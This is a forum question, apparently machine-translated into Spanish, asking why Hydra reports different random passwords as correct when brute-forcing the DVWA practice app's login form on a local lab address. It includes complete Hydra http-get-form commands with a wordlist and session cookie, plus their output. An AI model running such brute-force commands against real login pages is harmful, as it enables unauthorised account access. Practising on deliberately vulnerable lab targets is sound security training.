Problema con la Hidra de Linux: éxito de contraseña correcta al azar

Tengo un problema con Hydra cuando lo uso. He intentado las mismas líneas de comando que se encuentran en las guías directamente soportadas por la aplicación web maldita vulnerable (DVWA) v1.8.

Ok, entonces ... aquí está mi salida de intento ...

root@kali:~# hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt
http-get-form "/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&
password=^PASS^&submit=Login:Username and/or password incorrect." -f

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-09-06 05:18:12
[DATA] 16 tasks, 1 server, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.1.2   login: admin   password: shadow
[STATUS] attack finished for 192.168.1.2 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-09-06 05:18:12

Sí, es cierto que el método de formulario HTML es GET. : O)

Bien, independientemente de cuántas veces ejecute el comando, obtengo respuestas diferentes ... como ...

Intento 1

[80][www-form] host: 192.168.1.2   login: admin   password: 101193
[80][www-form] host: 192.168.1.2   login: admin   password: horse

Intento 2

[80][www-form] host: 192.168.1.2   login: admin   password: carhorn
[80][www-form] host: 192.168.1.2   login: admin   password: shadowfox
[80][www-form] host: 192.168.1.2   login: admin   password: multible

ACTUALIZACIÓN !!!!

hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt http-get-form 
"/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&
submit=Login:Username and/or password incorrect.:H=Cookie: security=high;
PHPSESSID=jtujthkeh08foqfomph232rp77"

Intenté agregar la identificación de la sesión de cookies también. También intenté poner en el:

-t <tasks>

Hasta ahora no he tenido éxito.